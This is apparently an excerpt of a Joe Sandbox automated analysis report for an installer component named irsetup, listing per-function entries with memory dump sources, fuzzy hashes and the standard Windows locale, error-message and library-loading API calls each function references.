                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2310398763-2766056989
                                                                                                                    • Opcode ID: 65e2a0e65b8682a92b97ad27ec68b60d0671ab9fbfa8d204ae279d19c13defa3
                                                                                                                    • Instruction ID: 6cf7d81aec9c8a7fb52b555c26e3c1199c8c24d09ef78c42bdf52907f5b2ca1f
                                                                                                                    • Opcode Fuzzy Hash: 65e2a0e65b8682a92b97ad27ec68b60d0671ab9fbfa8d204ae279d19c13defa3
                                                                                                                    • Instruction Fuzzy Hash: 21512432B1474D45FBFB8A3898557EE2390679C7D4F34C225BA5A866C2DF38C6198B00
                                                                                                                    Function 0000000180037058 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,00000001800378EC,?,?,?,?,00000000,0000000180028F80), ref: 00000001800370B3
                                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,00000001800378EC,?,?,?,?,00000000,0000000180028F80), ref: 00000001800370F5
                                                                                                                    • GetACP.KERNEL32(?,?,?,?,00000000,00000001800378EC,?,?,?,?,00000000,0000000180028F80), ref: 0000000180037118
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale
                                                                                                                    • String ID: ACP$OCP
                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                    • Opcode ID: 285159c17e2accfc9b13dbfaf6de1df71dd8840a5528aefbbd73939a99c6a5a6
                                                                                                                    • Instruction ID: 31aaffd01f1e8c00c037cc1d3137d0b0bd3712a38feaaca81b6232ad461d006d
                                                                                                                    • Opcode Fuzzy Hash: 285159c17e2accfc9b13dbfaf6de1df71dd8840a5528aefbbd73939a99c6a5a6
                                                                                                                    • Instruction Fuzzy Hash: 22214271300A49D5FAB7DB21E9803EB6390B74C7C8F46C521AA4D47666EF28C74DC700
                                                                                                                    Function 0000000180026EEC Relevance: 7.7, APIs: 5, Instructions: 233COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_isindst$DecodePointer__tzset_lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2552603377-0
                                                                                                                    • Opcode ID: 94332f3981986e09bb0910da463cacfcd71f2233cd8271649ea0427451d2a9fc
                                                                                                                    • Instruction ID: a068425ec057d83c032eccabfb2bcb394e40b10ab35c283d6b764921ba1d8b95
                                                                                                                    • Opcode Fuzzy Hash: 94332f3981986e09bb0910da463cacfcd71f2233cd8271649ea0427451d2a9fc
                                                                                                                    • Instruction Fuzzy Hash: B691F9B271074947EF9BDF29D55179A6792E7987C5F04C03AFA098A796EF38C6088B00
                                                                                                                    Function 00000001800223CC Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2310398763-0
                                                                                                                    • Opcode ID: 9d55c2a6a59a82965daf0e8e646d10d15f0e768c763823f1f9afd29687c29db6
                                                                                                                    • Instruction ID: f5c319ab33e0a8075ae33812c2a92c3b1c48c1f7b9d2e96434c6b2da3a56c658
                                                                                                                    • Opcode Fuzzy Hash: 9d55c2a6a59a82965daf0e8e646d10d15f0e768c763823f1f9afd29687c29db6
                                                                                                                    • Instruction Fuzzy Hash: D641F472A00A5892F7B7DF65E8017AE3390A7897E4F60C312BA7547AC5CE78C6498B40
                                                                                                                    Function 000000018001EBFC Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2310398763-0
                                                                                                                    • Opcode ID: 56bfbcb23a128c196e49c81069df4a7ee18435d57266e18776e5003e9f0183c1
                                                                                                                    • Instruction ID: 904b913cc3ec980953253aa1da5105bbdd00c7158b6d19c9bc06cc26936a1786
                                                                                                                    • Opcode Fuzzy Hash: 56bfbcb23a128c196e49c81069df4a7ee18435d57266e18776e5003e9f0183c1
                                                                                                                    • Instruction Fuzzy Hash: EF319372714BD985FBA7AB71AC0279E6291B78D7C0F10C526BA4A87B85DF3CC6098701
                                                                                                                    Function 0000000180021B88 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2310398763-2766056989
                                                                                                                    • Opcode ID: e305e226cf207c6d3f1dd86a634ac54eddaa51f416a3df2b113854f6797ccea9
                                                                                                                    • Instruction ID: dd94d8077e03ae22ffc14675778569cb5697c2bb140d0af9ff915d2123f11729
                                                                                                                    • Opcode Fuzzy Hash: e305e226cf207c6d3f1dd86a634ac54eddaa51f416a3df2b113854f6797ccea9
                                                                                                                    • Instruction Fuzzy Hash: 06412C72710A4D45FBA7CB36AC513FA635167A97E8F74C216BE29876D5DF38C2098300
                                                                                                                    Function 00000001800372F8 Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale$_getptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1743167714-0
                                                                                                                    • Opcode ID: b4030c375111dc87c7a81313f96055d9207103059a3c94d77078ed0d4a0bec02
                                                                                                                    • Instruction ID: 9853df9228a634b84d650e4cd0a57f6a8145f4ab692f0d1b0a1c4647dd7ef205
                                                                                                                    • Opcode Fuzzy Hash: b4030c375111dc87c7a81313f96055d9207103059a3c94d77078ed0d4a0bec02
                                                                                                                    • Instruction Fuzzy Hash: 5F614E72300A8897DBBF9A65D9443DE73A1F38C789F51811AE75D87791CF38E6688700
                                                                                                                    Function 0000000180010AB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID: system error %d
                                                                                                                    • API String ID: 3479602957-1688351658
                                                                                                                    • Opcode ID: 0b669dc38d1b02e4621c60ae251cc2d9fe0382d15873282476e5f311bfdc800a
                                                                                                                    • Instruction ID: 5165d0e7630ab715d2080139ec972a0a1eb7dfbc78c08bfca532b6b1035b4b33
                                                                                                                    • Opcode Fuzzy Hash: 0b669dc38d1b02e4621c60ae251cc2d9fe0382d15873282476e5f311bfdc800a
                                                                                                                    • Instruction Fuzzy Hash: 56011A31304A8882E7B29B55F49179AB2A0FB8D7C4F558125AA8907755DF79C6488B40
                                                                                                                    Function 000000018003758C Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale_getptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3731964398-0
                                                                                                                    • Opcode ID: ed92aab74e24e1c157c9003b9606fb17f54fc7dbdfdefb113adb3dab755d3dc2
                                                                                                                    • Instruction ID: 14398583cd06948a384385bef8cd944388f3e303429900c163158203f3a44866
                                                                                                                    • Opcode Fuzzy Hash: ed92aab74e24e1c157c9003b9606fb17f54fc7dbdfdefb113adb3dab755d3dc2
                                                                                                                    • Instruction Fuzzy Hash: 87218032300A8896EBBB9B25D9553DBB3A0F78C789F418125E75D87396DF38D668C700
                                                                                                                    Function 000000018003715C Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale_getptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3731964398-0
                                                                                                                    • Opcode ID: 3c3da7c936a9a1d7d7928e9dc572b502ff7468b01418821e0a10ab2f620c66c2
                                                                                                                    • Instruction ID: a232d29d29e465a5efbbe9cce7ee2381c15c0905e4f694560ebf159723a5cdbb
                                                                                                                    • Opcode Fuzzy Hash: 3c3da7c936a9a1d7d7928e9dc572b502ff7468b01418821e0a10ab2f620c66c2
                                                                                                                    • Instruction Fuzzy Hash: A9219D32300A8896EB6BDB64E8853DA73A0F38CB88F458126EA5D87755CF38D659C740
                                                                                                                    Function 0000000180037244 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2299586839-0
                                                                                                                    • Opcode ID: 6db5ba4383936ebe8e135fc20a07d54cabfd9c019b671f35b81fbb6f7a59b079
                                                                                                                    • Instruction ID: 1779db9e300c3f0be7c9e9f2cf91417e77d66518fa8146c6749ef4c91204d209
                                                                                                                    • Opcode Fuzzy Hash: 6db5ba4383936ebe8e135fc20a07d54cabfd9c019b671f35b81fbb6f7a59b079
                                                                                                                    • Instruction Fuzzy Hash: D911543231468D89EBB35765E4903EB6390A39D7CCF558532FA8D46286CE28C64E8710
                                                                                                                    Function 000000018003769C Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnumSystemLocalesA.KERNEL32(?,?,00000140,000000018003786E,?,?,?,?,00000000,0000000180028F80), ref: 00000001800376EC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2099609381-0
                                                                                                                    • Opcode ID: a772892202ddaf5bc622bbe73f4b19016f8f684e91aec17a0921c547e3cf381a
                                                                                                                    • Instruction ID: f37fcbef81f8ea48d901cc4db84f161ea8b218e8b27c5afce3cbb95621750e1d
                                                                                                                    • Opcode Fuzzy Hash: a772892202ddaf5bc622bbe73f4b19016f8f684e91aec17a0921c547e3cf381a
                                                                                                                    • Instruction Fuzzy Hash: B8115E767046088BFBAB9B31C4563EB23A1F358B8DF158815E60D46287CB78C6A98781
                                                                                                                    Function 0000000180037730 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnumSystemLocalesA.KERNEL32(?,?,00000140,0000000180037836,?,?,?,?,00000000,0000000180028F80), ref: 0000000180037765
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2099609381-0
                                                                                                                    • Opcode ID: 00904e545afd1d8bcc4d25644970bc411eaa74f4fe036e873c08ffc18f5239ee
                                                                                                                    • Instruction ID: 536939a62cb50f1254b4d1823daa1212530eac2b623dc0f81497a316b2726411
                                                                                                                    • Opcode Fuzzy Hash: 00904e545afd1d8bcc4d25644970bc411eaa74f4fe036e873c08ffc18f5239ee
                                                                                                                    • Instruction Fuzzy Hash: CAF0AF76704A4C8AF7AB8B31C4563EB27D1A398B88F19C015EA0D422D7DE78C6998741
                                                                                                                    Function 000000018003A528 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale_getptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3731964398-0
                                                                                                                    • Opcode ID: 30b74f351a9049185b5c7b206bcb158cb25f0595aff4ca38198320f560619d19
                                                                                                                    • Instruction ID: e8c26664117332e88b1dd3b4d098a9168b36064e77387e33d55b75928aa8ea7e
                                                                                                                    • Opcode Fuzzy Hash: 30b74f351a9049185b5c7b206bcb158cb25f0595aff4ca38198320f560619d19
                                                                                                                    • Instruction Fuzzy Hash: AAF05432614A8482D7518B15E44439AA760F7C8BE0F588210FB9D57B69CE28C9568B40
                                                                                                                    Function 000000018003D408 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2299586839-0
                                                                                                                    • Opcode ID: ff4c1dfb36b85c262c150c417b3b8a7bb35bc48b0e0c663feccef2f2a2400bd6
                                                                                                                    • Instruction ID: 54e8e65f8259819ee4ef56e8d4dbd3fa1e1d9d900539162f45c44271054f6398
                                                                                                                    • Opcode Fuzzy Hash: ff4c1dfb36b85c262c150c417b3b8a7bb35bc48b0e0c663feccef2f2a2400bd6
                                                                                                                    • Instruction Fuzzy Hash: 3CE06575218A8881F773D710E8013DB3750B79D7D8F814207F58C466A5DE3CC3598B00
                                                                                                                    Function 0000000180036164 Relevance: 53.8, APIs: 43, Instructions: 94COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1012874770-0
                                                                                                                    • Opcode ID: 2f2d5588e97d756e9a577e36f27ed1f0fafce1ce69f8890a1f8447804ed0654a
                                                                                                                    • Instruction ID: 03925525cb8416a551a9b4b4029cb5bf65b7929adb151452348da2fa71f7cf51
                                                                                                                    • Opcode Fuzzy Hash: 2f2d5588e97d756e9a577e36f27ed1f0fafce1ce69f8890a1f8447804ed0654a
                                                                                                                    • Instruction Fuzzy Hash: 7F416532611E4881EBA6AB75C4513FC2321ABC8BC4F048132F95D9B7A7CE10CB598354
                                                                                                                    Function 000000018003A1F8 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 130libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A235
                                                                                                                    • GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A251
                                                                                                                    • GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A279
                                                                                                                    • EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A282
                                                                                                                    • GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A298
                                                                                                                    • EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2A1
                                                                                                                    • GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2B7
                                                                                                                    • EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2C0
                                                                                                                    • GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2DE
                                                                                                                    • EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2E7
                                                                                                                    • DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A319
                                                                                                                    • DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A328
                                                                                                                    • DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A380
                                                                                                                    • DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A3A0
                                                                                                                    • DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A3B9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
